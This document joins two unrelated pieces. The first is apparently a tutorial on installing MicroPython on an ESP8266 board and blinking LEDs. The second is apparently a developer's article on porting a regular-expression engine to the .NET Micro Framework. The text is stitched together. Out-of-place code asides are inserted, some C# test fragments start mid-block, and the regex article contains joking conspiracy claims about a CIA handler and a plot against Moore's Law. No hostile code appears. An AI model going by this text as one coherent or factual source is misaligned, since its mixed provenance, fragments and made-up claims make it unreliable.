One of the first languages many people learn for programming electronics is Arduino, which requires knowledge of the specific structure needed to make a sketch work. Because of the way microcontrollers run code, even a simple Arduino sketch will typically consist of two functions: setup and loop. To write a sketch that blinks an LED attached to pin D4 (GPIO pin 2), we can use the following sketch in Arduino to set the LED pin to output, turn it on for a second, and then turn it off for a second.

void setup() {
  pinMode(D4, OUTPUT);
}

void loop() {
  digitalWrite(D4, HIGH); // turn the LED on (HIGH is the voltage level)
  delay(1000);            // wait for one second
  digitalWrite(D4, LOW);  // turn the LED off by making the voltage LOW
  delay(1000);            // wait for another second
}

For this seemingly simple action, we have a lot of code that seems pretty unintuitive for a beginner to understand. What's happening in this program is that the setup function runs once, setting our D4 pin to output mode, and then the loop runs continuously to turn the LED on and off. While this is a simple sketch, MicroPython can make it even easier.

MicroPython to the Rescue

In MicroPython, we can do the same thing in a way that's clearly understandable in two lines. First, we import the modules we need, and then we spell out what we want to do in clear and straightforward Python.

from time import sleep; from machine import Pin; led = Pin(2, Pin.OUT)  # Imports modules and defines GPIO pin 2 (D4) as an output
while True: led.on(); sleep(1); led.off(); sleep(1)  # Blinks LED on and off forever

If we want to get more technical, we can even write a function to read whether the LED is on or off and switch its state every second, all on the same line. This would require more setup in Arduino and is an excellent example of how MicroPython can make simple coding easy.
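The "read the state and switch it" idea can be tried out in ordinary desktop Python before touching the board. Below is a minimal sketch with a stand-in FakeLed class; FakeLed and toggle are illustrative names invented here, and on real hardware you would use machine.Pin and its value() method instead.

```python
# A stand-in for machine.Pin so the toggle logic can run on a desktop.
# FakeLed and toggle() are illustrative names, not part of MicroPython.
class FakeLed:
    def __init__(self):
        self.state = 0

    def value(self, v=None):
        # With no argument, report the state; with one, set it --
        # mirroring how machine.Pin.value() behaves.
        if v is None:
            return self.state
        self.state = v

def toggle(led):
    # Read whether the LED is on or off and switch its state.
    led.value(0 if led.value() else 1)

led = FakeLed()
toggle(led)  # now on
toggle(led)  # off again
```

On the board itself, you would swap FakeLed for machine.Pin(2, machine.Pin.OUT) and call toggle inside a loop with a one-second sleep.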
We can also use Python tricks like ternary operators to make our code more compact without being too difficult to understand. In this structure, conditionals are written as <expression1> if <condition> else <expression2>, allowing us to express both the condition and the expressions on the same line.

from time import sleep; from machine import Pin; led = Pin(2, Pin.OUT)
while True: led.value(1) if led.value() == 0 else led.value(0); sleep(1)

Reading MicroPython vs. Arduino

Of course, programming isn't about making your code as short as possible. If you want to abuse both languages, it's possible to write our LED-blinking code on a single line, but it's difficult to understand and generally not good practice. Here, we can see an abused one-line MicroPython program.

exec("from time import sleep; from machine import Pin; led = Pin(2, Pin.OUT)\nwhile True: led.on(); sleep(1); led.off(); sleep(1)")

While this is definitely more difficult to read than the two-line version above, it's still much easier to understand than the abused Arduino version below.

void setup() {pinMode(D4, OUTPUT);}void loop(){digitalWrite(D4,1);delay(1000);digitalWrite(D4,0);delay(1000);}

MicroPython's real value isn't being more compact than Arduino. In general, those new to microcontrollers will have an easier time understanding and writing MicroPython code, as led.on() is a much easier command to remember than digitalWrite(D4, HIGH) for turning on an LED.

REPL & Web REPL

Another feature of MicroPython is the ability to run code line by line, rather than needing to compile it first like in Arduino. That means if you want to start writing a program or working with a piece of hardware, you can connect to the REPL (read, evaluate, print loop) via a serial connection and input commands directly, with no need to write an entire sketch first.
There are many advantages to this, and while the REPL command-line interface isn't the only way to work with MicroPython, it's by far the fastest and easiest way to get started writing code on your microcontroller. Of course, we can also write Python files and upload them, but the simple ability to connect to an ESP8266 and create a Wi-Fi network in real time is pretty amazing.

MicroPython v1.11-8-g48dcbbe60 on 2019-05-29; ESP module with ESP8266
Type "help()" for more information.
>>> print("Hello world!")
Hello world!
>>>

This simple interface is available from the command line any time you connect your ESP8266 via a USB cable, and it can even be configured to work over Wi-Fi as well.

What You'll Need

To use MicroPython, you'll need an ESP8266-based microcontroller, such as the D1 Mini or NodeMCU. These boards are cheap and easy to find on websites like AliExpress and Amazon. You'll also need a computer with Python 3 installed and a Micro-USB cable to connect to the board. You'll need an internet connection to download the MicroPython firmware binary, a breadboard for connecting components, and a three-color RGB LED to test our output pins. If you don't have a three-color RGB LED, you can use regular LEDs as well.

Step 1: Download the ESPtool

To download the tool we'll need for flashing our ESP8266, we can use Python's package manager, Pip, by running the following command. If this doesn't work, you can also try replacing pip3 with pip, or installing the tool manually from the GitHub repo.
~$ pip3 install esptool
Collecting esptool
  Downloading (84kB)
    100% |████████████████████████████████| 92kB 928kB/s
Requirement already satisfied: ecdsa in /usr/lib/python3/dist-packages (from esptool) (0.13)
Collecting pyaes (from esptool)
  Downloading
Requirement already satisfied: pyserial>=3.0 in /usr/lib/python3/dist-packages (from esptool) (3.4)
Building wheels for collected packages: esptool, pyaes
  Running setup.py bdist_wheel for esptool ... done
  Stored in directory: /root/.cache/pip/wheels/56/9e/fd/06e784bf9c77e9278297536f3df36a46941c885eb23593bb16
  Running setup.py bdist_wheel for pyaes ... done
  Stored in directory: /root/.cache/pip/wheels/bd/cf/7b/ced9e8f28c50ed666728e8ab178ffedeb9d06f6a10f85d6432
Successfully built esptool pyaes
Installing collected packages: pyaes, esptool
Successfully installed esptool-2.8 pyaes-1.6.1

To verify the tool is working, you can run esptool.py and look for the following output.

esptool.py
esptool.py v2.8
usage: esptool [-h] [--chip {auto,esp8266,esp32}] [--port PORT] [--baud BAUD]
               [--before {default_reset,no_reset,no_reset_no_sync}]
               [--after {hard_reset,soft_reset,no_reset}] [--no-stub]
               [--trace] [--override-vddsdio [{1.8V,1.9V,OFF}]]
               {load_ram,dump_mem,read_mem,write_mem,write_flash,run,image_info,make_image,elf2image,read_mac,chip_id,flash_id,read_flash_status,write_flash_status,read_flash,verify_flash,erase_flash,erase_region,version}
               ...
esptool.py v2.8 - ESP8266 ROM Bootloader Utility

positional arguments:
  {load_ram,dump_mem,read_mem,write_mem,write_flash,run,image_info,make_image,elf2image,read_mac,chip_id,flash_id,read_flash_status,write_flash_status,read_flash,verify_flash,erase_flash,erase_region,version}
    read_flash_status   Read SPI flash status register
    write_flash_status  Write SPI flash status register
    read_flash          Read SPI flash content
    verify_flash        Verify a binary blob against flash
    erase_flash         Perform Chip Erase on SPI flash
    erase_region        Erase a region of the flash
    version             Print esptool version

optional arguments:
  -h, --help            show this help message and exit
  --chip {auto,esp8266,esp32}, -c {auto,esp8266,esp32}
                        Target chip type
  --port PORT, -p PORT  Serial port device
  --baud BAUD, -b BAUD  Serial port baud rate used when flashing/reading
  --before {default_reset,no_reset,no_reset_no_sync}
                        What to do before connecting to the chip
  --after {hard_reset,soft_reset,no_reset}, -a {hard_reset,soft_reset,no_reset}
                        What to do after esptool.py is finished
  --no-stub             Disable launching the flasher stub, only talk to ROM
                        bootloader. Some features will not be available.
  --trace, -t           Enable trace-level output of esptool.py interactions.
  --override-vddsdio [{1.8V,1.9V,OFF}]
                        Override ESP32 VDDSDIO internal voltage regulator
                        (use with care)

You can also see the many options available to us. We'll be taking advantage of the erase and flash functions to introduce the right binary to our microcontroller.

Step 2: Identify Your Serial Port

We'll have to find the serial address of our ESP8266. To do so in Linux, we can use the following command. Make sure your ESP8266 board is plugged into your computer or it won't find anything.
~$ dmesg | grep tty

In macOS, the command and output look like this:

~$ ls /dev/cu.*
/dev/cu.Bluetooth-Incoming-Port
/dev/cu.usbserial-14140
/dev/cu.MALS
/dev/cu.wchusbserial14140

The correct address to use here is /dev/cu.wchusbserial14140, even though both it and /dev/cu.usbserial-14140 are associated with our ESP8266. You can identify which entries are tied to your device by unplugging it and re-running the command to see the difference. Once you know where to find your ESP8266 on the system, it's time to erase and flash it.

Step 3: Erase the ESP8266

With the correct serial address from before, we'll use the following command to erase our ESP8266, making sure to change the --port value to the address of the ESP8266 you've found on your system.

~$ esptool.py --port /dev/cu.wchusbserial14140 erase_flash
...
Erasing flash (this may take a while)...

Once we see this output, we're ready to upload a MicroPython binary to our board and get started.

Step 4: Download the Firmware Binary

We'll need to download the most recent MicroPython binary for our ESP8266. You can do so from the official MicroPython downloads page. When that's done, we'll be able to use the esptool to flash it to our now-empty board.

Step 5: Flash Your Firmware to the Board

To flash our firmware, we'll need to use a command in the following format, making sure to replace the serial port and the path to the firmware binary with the ones you're working with.

~$ esptool.py --port SERIAL_PORT --baud 460800 write_flash --flash_size=detect 0 FIRMWARE.BIN

Upon running the command, you should see output like the below.

esptool.py --port /dev/cu.wchusbserial14140 --baud 460800 write_flash --flash_size=detect 0 /Users/skickar/Downloads/esp8266-20190529-v1.11.bin
...
Changing baud rate to 460800
Changed.
Configuring flash size...
Auto-detected Flash size: 4MB
Flash params set to 0x0040
Compressed 617880 bytes to 402086...
Wrote 617880 bytes (402086 compressed) at 0x00000000 in 9.6 seconds (effective 514.5 kbit/s)...
Hash of data verified.
Leaving...
Hard resetting via RTS pin...

After allowing the esptool to finish writing to the board, you should have the ability to connect via a MicroPython REPL interface!

Step 6: Enter MicroPython REPL

To connect to the command-line interface, use the following format in a terminal window, making sure to replace the serial port with the one your device is using.

~$ screen SERIAL_PORT 115200

On a Windows system, you'll need to use PuTTY to connect instead. Once you connect, you should see a prompt like the one below.

MicroPython v1.11-8-g48dcbbe60 on 2019-05-29; ESP module with ESP8266
Type "help()" for more information.
>>>

To exit screen, you can press Control-A and then K to kill the window. From inside our prompt, we can run a short piece of code to confirm we're able to run Python on the ESP8266.

>>> x = "Hello World"
>>> print(x)
Hello World

Now that we've got MicroPython running, let's try out a few commands to work with outputs.

Step 7: MicroPython Basics

In our MicroPython REPL shell, let's run the following two lines to see if we're able to control hardware successfully. After looking up the D1 Mini's pinout diagram, we can see that the internal LED is located on GPIO pin 2, or D4 on the silkscreen.

>>> from time import sleep; from machine import Pin; led = Pin(2, Pin.OUT)  # Imports modules and defines GPIO pin 2 (D4) as an output
>>> while True: led.on(); sleep(1); led.off(); sleep(1)  # Blinks LED on and off forever
...

You should see the LED on your D1 Mini start to blink off and on once per second! You can press Control-C to stop the program.

Step 8: Uploading a Python Program

Now we can add an output to see if we can control external components. I'll be using an RGB LED, but you can use three regular LEDs as well. I'll be plugging the red, green, and blue wires from the LED into GPIO pins 0, 2, and 4, which work out to pins D3, D4, and D2 on the silkscreen.
Now, we'll need to install Adafruit Ampy. We can do this in a fresh terminal window with the following command.

~$ pip3 install adafruit-ampy
Collecting adafruit-ampy
  Downloading
Requirement already satisfied: click in /usr/lib/python3/dist-packages (from adafruit-ampy) (7.0)
Collecting python-dotenv (from adafruit-ampy)
  Downloading
Requirement already satisfied: pyserial in /usr/lib/python3/dist-packages (from adafruit-ampy) (3.4)
Installing collected packages: python-dotenv, adafruit-ampy
Successfully installed adafruit-ampy-1.0.7 python-dotenv-0.10.3

Once Ampy is installed, we can use the format ampy --port /serial/port run test.py to run a Python file on our connected board. To pulse our RGB LED, type nano fades.py to create a blank Python file, then paste the following code into it.

import time
from machine import Pin, PWM

list = [0, 2, 4]

def PWMChange(pinNumber, intensity, delayTime):
    pwm2 = PWM(Pin(pinNumber), freq=20000, duty=intensity)
    time.sleep_ms(delayTime)

def flashing():
    for elements in list:
        PWMChange(elements, 0, 10)
    for elements in list:
        for i in range(0, 255):
            PWMChange(elements, i, 10)
            if i > 253:
                for i in range(255, 0, -1):
                    PWMChange(elements, i, 10)

while True:
    flashing()

Now, save the file by pressing Control-X, then Y to confirm. To run the file on the board, confirm you have the correct serial port, and then type the following command after swapping out /dev/cu.wchusbserial14440 for the serial port of your board.

~$ ampy --port /dev/cu.wchusbserial14440 run fades.py

You should see the code start to run on your board! If you want your code to run at boot like an Arduino (but not on a loop), you'll need to replace the "main.py" file on the board. You can upload our Python file and replace the main.py file on the board with the following command.
~$ ampy -p /dev/cu.wchusbserial14440 put fades.py /main.py

With this command, our board will run the program we just uploaded at boot, but not in a loop like an Arduino, unless you specify that with an endless loop as we did in the code above. "While True" loops run forever and don't give the board a chance to finish booting if they have replaced main.py, but you can stop the program in the serial REPL by pressing Control-C and then erase the board to fix the issue.

MicroPython Can Control Hardware in a Single Line of Code

In a few short steps, we've set up an ESP8266 microcontroller to work with MicroPython and learned the basics of working with outputs. We've also gone from running code line by line in the REPL shell to writing Python files and both running and uploading them to our board. To learn more about what you can do with MicroPython, I highly recommend checking out the official documentation on the MicroPython website.

I hope you enjoyed this guide to getting started with MicroPython on the ESP8266! If you have any questions about this tutorial on MicroPython, leave a comment below, and feel free to reach me on Twitter @KodyKinzie.

- Follow Null Byte on Twitter, Flipboard, and YouTube
https://null-byte.wonderhowto.com/how-to/get-started-with-micropython-for-esp8266-microcontrollers-0210302/
It was August the 18th, 2011. The Regular Expression implementation for the .NET Micro Framework had just been publicly mentioned. The pressure was on for the community to find bugs, and sure enough, after some time with hungry developers using the library, a bug was eventually found; however, it was not in the RegEx engine but in the StringBuilder (which was also contributed by myself). After promptly fixing the issue in less than 24 hours, I immediately tested the other supported expressions and even utilized my new cycle-timing feature to ensure I was not wandering off into the unmanaged void and creating access violations by accident.

The main purpose of this article is to decide whether the missing methods have any impact on the developers utilizing the library and whether further development is even warranted based on this article. The latter purpose is to ensure that the differences as well as the similarities are appropriately highlighted, that the cycle-timing feature is explained in a way which makes it easy for existing Regex users to understand and use it in the same way, and, last but not least, to provide a few laughs at the expense of time alone.

With respect to the developers of the Regular Expression syntax, and by virtue of the inventors of the Unix operating system, not to mention by merit the creator of the language which powered it, I will say that Regular Expressions are nothing more than a mythical black box. It was with great pride that I learned how the great theory of automata was formed and implemented. I was filled with odes of joy when I learned there were even two separate possible representations, which I like to envision as biased and unbiased: Deterministic Finite Automata and Nondeterministic Finite Automata. It was an even greater feeling when I learned that you could convert between the two and that there was really no difference, save performance or the instructions required to complete the determination.
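To make the DFA/NFA talk above a little more concrete, here is a toy illustration in standard Python (it has nothing to do with the library's C# internals): a tiny NFA for the language (a|b)*abb, simulated by tracking the set of states it could be in, which is essentially the subset construction performed on the fly.

```python
# Transition table for a small NFA accepting (a|b)*abb.
# Each state maps an input symbol to the set of possible next states.
NFA = {
    0: {'a': {0, 1}, 'b': {0}},
    1: {'b': {2}},
    2: {'b': {3}},
}
START, ACCEPT = {0}, {3}

def nfa_match(s):
    # Track every state the NFA could be in at once -- the on-the-fly
    # equivalent of converting to a DFA via subset construction.
    states = set(START)
    for ch in s:
        states = set().union(*(NFA.get(q, {}).get(ch, set()) for q in states))
    return bool(states & ACCEPT)
```

A DFA built ahead of time would precompute those state sets once, trading compile-time work for faster matching; taking the union per input character, as above, is the interpretive alternative.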
It was with great sadness and.... or 'Murderous Intent' that I learned, via the history of time and through research, that both schools of thought were never unified and battled endlessly, much as the physicists did who inspired some of their reasoning. The disease of difference was forever engrained into the minds of programmers, and the symptom was that each one would naively utilize DFA minimization or other equivalence principles until they woke up and realized that the problem could and should be solved by combining and evolving the compiled features into a RegExNext or some such. Even after most realized this, they instead implemented various interpreters into their language implementations and utilized them in an attempted conspiracy to force the failure of Moore's Law prematurely, and also to allow the notion of high-capacity hard disks to take off. While initially successful, this plot was thwarted by a flood and newer solid-state technology, which actually then benefited the campaign by forcing a rise in cost as well as ensuring that solid-state technology had the required money for research. Without exposing my CIA handler and the methods by which I have confirmed these various operations, I know that my story may seem highly suspicious; however, what I can say is that I implore you to look into Einstein, how he just so happened to want to escape to America, and how he then came up with General Relativity. I will also say that a proper use of common sense combined with good design and optimization can always outperform a Regular Expression engine (hands down/up). Now, with that out of the way, I will move onto the meat of the article, which I hope is what you came here looking for, rather than my delusional ramblings, which have only a slight possibility of being related and an even smaller margin of actually being true. Please be active and leave feedback if you care about kittens.
Users typically utilize Regular Expressions as a way to exploit what seems like a shortcut through some seemingly complex string-handling task. But before we begin to get into the main point of how to use the library and how it differs from the full framework implementation, I will ask that we take a second to realize other possible uses for Regular Expressions. Once you learn a bit about string encoding and get into more complex Regular Expressions (herein known as Regexes), or if you already have, you can skip down to the main points and examples.

A developer can use Regular Expressions to do quite a bit of work on binary data as well. You can use Regexes to match sections of logic in code analysis, as well as to get relevant or similar portions of an image from another image, among many other variations of the string-matching technique. The technique is still applicable since a char is a byte and vice versa; there is no loss, nor even a conversion, which is done. It is more like a typedef or an alias which takes place to provide these constructs to a developer.

Now, possibly with your mind even more confused than it was before, or possibly enlightened or even argumentative, I will ask that we let this go for now and move onto the main points. The new timing mechanism, a.k.a. RegexOptions.Timed, is used to ensure that a match operation does not take longer than the given amount of time, defined in ticks.
This was easily achieved by ensuring that the ticks elapsed since the initial execution are compared via the following code:

//If we are keeping time and the time we started matching at is more than MaxTick
//ticks ago, something went wrong; allow for a break - JRF
if (timed && (DateTime.Now.Ticks - startTicks) >= MaxTick) throw new RegexExecutionTimeException(idxStart);
else startTicks = DateTime.Now.Ticks;

It ensures that expressions which include possibly endless results, such as '\w+' or '\b+', are safely executed and the system does not waste time needlessly attempting to match. I also pondered the possibility of adding a Regex.Lazy flag which would optionally sleep for the given ticks and then possibly increase the allocated ticks until the exception.

The RegexExecutionTimeException class takes the position in the match stack and then allows the catcher to restart the matching process, either over or later, by providing the index last evaluated and keeping the stack registers and the class state in the same state as before the exception. Below you will find a meaningless example:

int catchCount = 0;
//Should match for a long time and throw the timing exception.
//This could be changed up a bit to show partial matching.
string pattern = @"\b(?:(\w+))\s+(\1)\b+";
Regex rx = new Regex(pattern, RegexOptions.IgnoreCase | RegexOptions.Timed);
rx.MaxTick = ushort.MaxValue * 2;
// Define a test string.
string text = "The the quick brown fox fox jumped over the lazy dog dog.";
int start = 0;
TryToMatch:
try
{
    // Find matches.
    MatchCollection matches = rx.Matches(text, start);
    //Log.Comment("Found Matches:" + matches.Count);
    //If we get here, you have a really fast processor and timing is not working as expected.
    return MFTestResults.Fail;
}
catch (RegexExecutionTimeException ex)
{
    if (++catchCount > 5) return MFTestResults.Pass;
    else
    {
        //Try to match again at the index.
        //Could check the index or access the Groups here,
        //but in this example we never matched.
        start = ex.Index;
        goto TryToMatch;
    }
}
catch
{
    return MFTestResults.Fail;
}

A user can find a better value for MaxTick by performing matches on strings with known results to obtain a statistic which may be applied in an algorithm (or lack thereof) to ensure stricter operation. The default value is long.MaxValue / 2.

I thought of adding a Profile method which was internal; however, I could not get feedback on the implementation, nor did I want to start adding even more nonsense to a seemingly happy theory and science which did not accept change without what seemed like great loss in both dignity and pride, which is obviously the worst philosophical sin in my humble opinion(s) at the current time of this writing.

I am not sure of other implementations which have this feature, let alone humans who have also expressed such concerns or ideas such as, but not limited to, the ones I have listed in this writing, nor am I sure that it is an aspect relevant to this article... You will see from the following test example that the syntax, from the perspective of the C# compiler, has been kept as close as possible to the full framework, and no such deviation has been applied to either it or the StringBuilder class.
//MSDN Test from
string input = "int[] values = { 1, 2, 3 };\n" +
    "for (int ctr = values.GetLowerBound(1); ctr <= values.GetUpperBound(1); ctr++)\n" +
    "{\n" +
    " Console.Write(values[ctr]);\n" +
    " if (ctr < values.GetUpperBound(1))\n" +
    " Console.Write(\", \");\n" +
    "}\n" +
    "Console.WriteLine();\n";
string pattern = "Console.Write(Line)?";
Match match = Regex.Match(input, pattern);
int matchCount = 0;
string expected0 = null;
string expected1 = null;
while (match.Success)
{
    Log.Comment("'" + match.Value + "' found in the source code at position " + match.Index + ".");
    if (matchCount == 0) expected0 = match.ToString();
    else if (matchCount == 2) expected1 = match.ToString();
    match = match.NextMatch();
    ++matchCount;
}
return matchCount == 3 && expected0 == "Console.Write" && expected1 == "Console.WriteLine" ? MFTestResults.Pass : MFTestResults.Fail;

You will also see that MatchCollection is present.

    // ...
    Log.Comment(matches.Count + " matches found in:\n " + text);
    // Report on each match.
    foreach (Match match in matches)
    {
        GroupCollection groups = match.Groups;
        Log.Comment("'" + groups["word"].Value + "'" + " repeated at positions " + groups[0].Index + " and " + groups[1].Index);
    }
    //Requires named capture
    return MFTestResults.Pass;
}
catch
{
    //Known to fail until named capture is implemented
    //See
    return MFTestResults.KnownFailure;
}

We will now begin to explore the differences with respect to the Jakarta library from which the code was ported and the full framework implementation.

// Define a regular expression for repeated words.
//Was trying to add ?: to the second group to force its presence
//at least once, but you can't use back references when you do this with this engine;
//there must be another way!
//Has correct indexes but extra matches!!!
//@"\b(?:\w+)\s+(\1)\b"
//pattern = @"\b(?:\w+)\s+((\s+(\1))\b)";
////Only 1 match
//pattern = @"\b(\w+)\s+\w+(\k\1)\b";
//Almost perfect
//pattern = @"\b(?:\w+)\s+(\w+)\1\b";
//Correct positions
//pattern = @"\b(?:\w+)\s+(\w+\1)\b";
//Correct positions, extra matches
//pattern = @"\b(\w+)\b"
//pattern = @"\b\w+\s+\b(\1)"
//These both work in the Jakarta applet... check for bugs
string pattern = @"\b(?:(\w+))\s+(\1)\b";
//string pattern = @"\b(\w+)\s+\1\b";
Regex rx = new Regex(pattern, RegexOptions.IgnoreCase);
// Define a test string.
string text = "The the quick brown fox fox jumped over the lazy dog dog.";
//Need dumpProgram to determine if my compiler compiled the same... I
//think the problem lies in the Match object... I am not passing something
//correctly to the constructor....
// Find matches.
MatchCollection matches = rx.Matches(text);
TestTestsHelper.ShowParens(ref rx);
// Report the number of matches found.
Log.Comment(matches.Count + " matches found in:\n " + text);
// Report on each match.
foreach (Match match in matches)
{
    GroupCollection groups = match.Groups;
    Log.Comment("'" + groups[0].Value + "'" + " repeated at positions " + groups[0].Index + " and " + groups[1].Index);
}
//There may be bugs in the engine, but this is likely due to differences in Regex
//engines, because I have not implemented transfer capture;
//this is known to fail for now, so long as no exception is thrown.
return MFTestResults.KnownFailure;
}
catch
{
    return MFTestResults.Fail;
}

From the code example and comments above, you will see that the changes to the engine give some results which may not be expected at first with respect to either of the other implementations. This is a classic problem in Regex implementations, and great care is needed to ensure that the theory is followed as closely as possible to ensure compatibility. Overall, this was the hardest part, because of the notion of UTF-8 encoding in the Micro Framework versus Unicode in the full framework.
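The UTF-8 versus Unicode pitfall mentioned above is easy to demonstrate. The sketch below uses standard Python's re module purely as an analogy (it is not the Micro Framework engine): the same \w+ pattern gives different answers over a text string and over its UTF-8 bytes.

```python
import re

text = "café"
data = text.encode("utf-8")  # b'caf\xc3\xa9'

# Over str, \w is Unicode-aware and swallows the accented character.
unicode_hit = re.match(r"\w+", text).group()

# Over bytes, \w only covers ASCII, so the match stops before 0xC3.
byte_hit = re.match(rb"\w+", data).group()

print(unicode_hit)  # café
print(byte_hit)     # b'caf'
```

An engine that stores its opcodes and input as UTF-8 bytes therefore has to take extra care to report the same match boundaries a Unicode-based engine would.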
I was even tempted to use shorts rather than chars for the opcodes for this very reason; however, it turned out to be okay in the end without such drastic changes. The bottom line is that the results are in line with what the full framework returns under almost all circumstances when using syntax that is supported. For example, named capture is NOT supported; however, it would be trivial to add to the current implementation, as the members are already present and the engine just needs small changes to make it actually work (which may end up being another article in this series, depending on the feedback). The same goes for various other parts of the syntax, which could and may very well be added depending on how the feedback and community discussion coalesce, combined with how my workload is dealt with.

The implementation also keeps a cache of recently compiled regular expressions (just like the full framework implementation). The cache can be cleared by setting the static member Regex.CacheSize to -1, which clears the cache and prevents newly compiled expressions from being added. The default cache size is 25 instances, at which point entries are recycled from the cache on a FILO basis.

What's Missing or Different?

In the 4.2 implementation there are some members and methods missing from the Regex class, e.g. those for operating on a Capture. I will elaborate further, and you will hopefully decide if this impacts development... For example, take the previously stated issue of UTF-8 vs Unicode characters and the following code example.

/*
// The example displays the following output:
//    : Microsoft
//    : Excel
//    : Access
//    : Outlook
//    : PowerPoint
//    : Silverlight
// Found 6 trademarks or registered trademarks.
*/
bool result = true;
int expectedCount = 6;
string pattern = @"\b(\w+?)([ ])";
string input = "Microsoft Office Professional Edition combines several office " +
               "productivity products, including Word, Excel , Access , Outlook , " +
               "PowerPoint , and several others. Some guidelines for creating " +
               "corporate documents using these productivity tools are available " +
               "from the documents created using Silverlight on the corporate " +
               "intranet site.";
Regex test = new Regex(pattern);
MatchCollection matches = test.Matches(input);
foreach (Match match in matches)
{
    GroupCollection groups = match.Groups;
    Log.Comment(groups[2] + ": " + groups[1]);
}
Log.Comment("Found " + matches.Count + " trademarks or registered trademarks.");
if (matches.Count != expectedCount)
{
    result = false;
}
if (matches[0].ToString() != "Microsoft ") { result = false; }
else if (matches[1].ToString() != "Excel ") { result = false; }
else if (matches[2].ToString() != "Access ") { result = false; }
else if (matches[3].ToString() != "Outlook ") { result = false; }
else if (matches[4].ToString() != "PowerPoint ") { result = false; }
else if (matches[5].ToString() != "Silverlight ") { result = false; }
return result ? MFTestResults.Pass : MFTestResults.Fail;

The weird character is supposed to be either ©, ™, ℠, or ®; however, with the UTF-8 encoding in use in the framework this was not a "showstopper": people basically just have to understand this platform difference. I could have done something weird or fancy to try to solve this; however, I also see the framework growing to support various different locales, so I will have to wait for feedback to determine how much of a pain in the ass this really is. I suspect that, since this can also technically happen on the full framework if you are not careful, it is not as big a deal as I am making it. I will also say that character literals may not have been the best way to match here, and that there might be a need for specific character codes, as well as encodings, to be given in future expression syntax parsers; either that, or at least an Encoding member on the Regex class itself, to ensure it can optionally match against an alternate encoding.

The entire process of porting the code took all of 4 hours, if that. I was compiling expression strings into complete RegexPrograms and all of the tests passed! I was very happy with myself because I did not end up using a code tool to do the port; I did it by hand, and the results spoke for themselves. Because of this I was able to jump in and out of the code as if it were my own. Some of the comments were lacking, but I did my best to ensure that a proper description was given to methods, and that each line which was even remotely hard to read had some type of comment, ensuring future developers would understand why I was using the variables the way I was. I then basically started top down with MSDN examples which I knew had to produce consistent results across both implementations. This is where the headaches started: the matching was as per the theory in the engine, but the names of the members were totally different than in the full framework implementation.
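One way to sidestep the literal-character problem (in any engine; JavaScript is used here purely for illustration) is to match the symbols by their code points rather than pasting the literals into the source file, which keeps the pattern immune to source-file encoding:

```javascript
// Match trademark-like symbols by escaped code point instead of literal
// characters: © U+00A9, ® U+00AE, ™ U+2122, ℠ U+2120.
const marks = /[\u00A9\u00AE\u2122\u2120]/g;

const input = "Microsoft\u00AE Office and Excel\u2122 are products.";
const found = input.match(marks);
console.log(found); // the mark symbols actually present in the input
```

This is the kind of thing an Encoding-aware syntax parser, as suggested above, could do automatically for the developer.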
The API was also vastly different. This took another 2 or 3 days to get completely right, with no tests failing from the ported library's unit test code. The code reviewer I was working with had some unfortunate problems, so this delayed the review process for my assignment by about 2 whole months. After Microsoft saw I was so bored that I did a complete WebSocket implementation in less than 48 hours, they emailed me and the code reviewer to find out why I was now working on WebSockets... Long story short, Lorenzo directly reviewed and helped me make some decisions, such as redoing the StringBuilder from the full framework code and then implementing the minimal set of methods which would enable the MSDN examples to pass using the same code. This sounded like it would be easy at first; however, I quickly learned that this is where the engines were most different: the full framework implementation utilizes various specialized matching algorithms based on the expression given and the theories behind each of the matching algorithms. Without getting too caught up in NFA and DFA, or Boyer-Moore and Thompson, I just named the properties as per the full framework implementation, and this was easy to do. I even promoted and demoted a few fields and properties and things still worked, but some of the MSDN examples required the Match, MatchCollection, Capture, and Group classes. So I began porting them directly over from the full framework to ensure the API was the same and that the results returned from the examples would match.
I was not allowed to take methods such as Pop and Crawl from the full framework without first demonstrating that I understood the code and that I had a conforming implementation. I required the full framework methods not because I wanted to be lazy, but because I wanted to ensure that the results returned from my classes were consistent with the full framework, and that the Reflected calls were similar to what was on the full framework. This notion eventually caught on when I was able to demonstrate, within one week, that there were only some very small issues and that I had everything save a few small missing features. We will now take some time to explore what is missing or different about the implementation, and even give some interesting ideas for future implementations.

The main theory of the ported code is to create a RegexProgram from the given expression. This program is essentially a state machine, which allows it to expose certain functions, e.g. IsMatch, which allow the program to return meaningful results such as true or false, or the index of the match, inter alia.

There is a RegexCompiler class which is responsible for taking the given expression and compiling it into a RegexProgram instance. There is a DebugRegexCompiler which exposes a few extras typically used for debugging and bug testing, but which can also be used at runtime with dynamically created regular expressions.

using System;
using System.Text;
using System.Collections;

namespace System.Text.RegularExpressions
{
#if DEBUG
    /// <summary>
    /// A subclass of RegexCompiler which can dump a regular expression program for debugging purposes.
    /// </summary>
    public class RegexDebugCompiler : RegexCompiler
    {
        /// <summary>
        /// Mapping from opcodes to descriptive strings
        /// </summary>
        static Hashtable hashOpcode = new Hashtable()
        {
            {OpCode.ReluctantStar, "ReluctantStar"},
            {OpCode.ReluctantPlus, "ReluctantPlus"},
            {OpCode.ReluctantMaybe, "ReluctantMaybe"},
            {OpCode.EndProgram, "EndProgram"},
            {OpCode.BeginOfLine, "BeginOfLine"},
            {OpCode.EndOfLine, "EndOfLine"},
            {OpCode.Any, "Any"},
            {OpCode.AnyOf, "AnyOf"},
            {OpCode.Branch, "Branch"},
            {OpCode.Atom, "Atom"},
            {OpCode.Star, "Star"},
            {OpCode.Plus, "Plus"},
            {OpCode.Maybe, "Maybe"},
            {OpCode.Nothing, "Nothing"},
            {OpCode.GoTo, "GoTo"},
            {OpCode.Continue, "Continue"},
            {OpCode.Escape, "Escape"},
            {OpCode.Open, "Open"},
            {OpCode.Close, "Close"},
            {OpCode.BackRef, "BackRef"},
            {OpCode.PosixClass, "PosixClass"},
            {OpCode.OpenCluster, "OpenCluster"},
            {OpCode.CloseCluster, "CloseCluster"}
        };

        /// <summary>
        /// Returns a descriptive string for an opcode.
        /// </summary>
        /// <param name="opcode">Opcode to convert to a string</param>
        /// <returns>Description of opcode</returns>
        String OpcodeToString(char opcode)
        {
            // Get string for opcode
            String ret = (String)hashOpcode[opcode];

            // Just in case we have a corrupt program
            if (ret == null)
            {
                ret = "UNKNOWN_OPCODE";
            }
            return ret;
        }

        /// <summary>
        /// Return a string describing a (possibly unprintable) character.
        /// </summary>
        /// <param name="c">Character to convert to a printable representation</param>
        /// <returns>String representation of character</returns>
        String CharToString(char c)
        {
            // If it's unprintable, convert to '\###'
            if (c < ' ' || c > 127)
            {
                return "\\" + (int)c;
            }

            // Return the character as a string
            return c.ToString();
        }

        /// <summary>
        /// Returns a descriptive string for a node in a regular expression program.
        /// </summary>
